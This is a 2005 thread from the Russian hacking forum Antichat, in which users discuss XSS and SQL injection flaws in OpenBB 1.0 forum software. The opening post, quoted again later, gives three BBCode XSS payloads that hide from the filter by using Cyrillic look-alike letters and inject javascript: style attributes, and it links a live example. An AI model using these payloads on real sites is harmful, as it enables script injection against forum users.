Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS в OpenBB (https://forum.antichat.xyz/showthread.php?t=6706)

KEZ 23.05.2005 17:24

XSS в OpenBB
 
OpenBB 1.0 (уязвимы возможно и другие версии)
Травиально.

как всегда через руские буквы
Код:

[еmаil=]aaa[/emаil]`style=background:url(javascript:alert());

[cоlor=a]a[/colоr]`style=background:url(javascript:alert());

[sizе=[cоlor=a=`]a[/cоlor]]a[/sizе]`style=background:url(javascript:alert());

Есть ещё XSS, в основном с использованием других тегов,
найти их очень просто, я их не пишу.


Пример работы уязвимости:
http://s-channel.hut.ru/forum/read.php?TID=6&page=1#87

KEZ 23.05.2005 17:27

Также я нашел несколько Sql инжекция. Скоро опубликую

PinkPanther 23.05.2005 20:04

КЕЗ, ты на локалхосте её сначала проверял?
Я тож как узнал про уязвимости
Цитата:

Опасность:критическая
Тип:удалённая
Описание:параметр TID в скрипте read.php не фильтруется должным образом что может привести к SQL - иньекции.
В параметр reverse в member.php можно внедрить произвольный HTML или JavaScript код и вызвать XSS
Уязвимые версии:OpenBB 1.x
Наличие эксплойта:нет
Решения:нет
сразу на оффсайт, думаю скачаю, поищу, тока ни оффсайт, ни другие сайты, ссылки с которых ведут на оффсайт, не фурачат =(
И вот мля опять я опаздал =(

З.Ы. Обажаю таких разработчиков, дыры(сплойты) примитивнейшие.

KEZ 23.05.2005 20:14

Это фигня с securitylab.ru.
А свои теги я сам нашел... И как я их мог НЕ ПРОВЕРЯТь на локалхосте? Конечно проверял.
Самый обычные XSS

PinkPanther 23.05.2005 20:23

Не, я не то имел ввиду. Просто(может я галимо искал), но во время приведенного мной описания релиза оффсайт не работал. Вот это я и спросил...

Забей кароче....я просто хотел узнать где и когда ты его качнул, хочу сам посмотеть.

З.Ы. Обажаю таких разработчиков, дыры(сплойты) примитивнейшие.

KEZ 23.05.2005 20:26

примитивные... да... они подойдут и к другим форумам кстате...
емейл, урл, имадж - самые распространенные... а сколько на форуме SQL inj

PinkPanther 23.05.2005 20:38

Вот зайди щас на оффсайт: http://www.openbb.com/ и ты поймеш мой вопрос.
Где ты его взял? Потому что, толи я галимо ищу, толи его хер где найдеш нормальный.
Дай плиз ссылку, где качал. Мне оч интересно самому посмотреть.

KEZ 23.05.2005 21:00

Я гдето с sourceforge.net качал... щас кажу

Algol 23.05.2005 21:03

Цитата:

Сообщение от KEZ
OpenBB 1.0 (уязвимы возможно и другие версии)
Травиально.

как всегда через руские буквы
Код:

[еmаil=]aaa[/emаil]`style=background:url(javascript:alert());
 
[cоlor=a]a[/colоr]`style=background:url(javascript:alert());
 
[sizе=[cоlor=a=`]a[/cоlor]]a[/sizе]`style=background:url(javascript:alert());

Есть ещё XSS, в основном с использованием других тегов,
найти их очень просто, я их не пишу.


Пример работы уязвимости:
http://s-channel.hut.ru/forum/read.php?TID=6&page=1#87

Первые две я не совсем понял...там где-то ошибка..

KEZ 24.05.2005 21:06

Алгол, все верно, я же только что проверял на форумах и локалхосте.
Может там изза того что я буквы заменил на руские или форум чтото пропарсил


Время: 17:47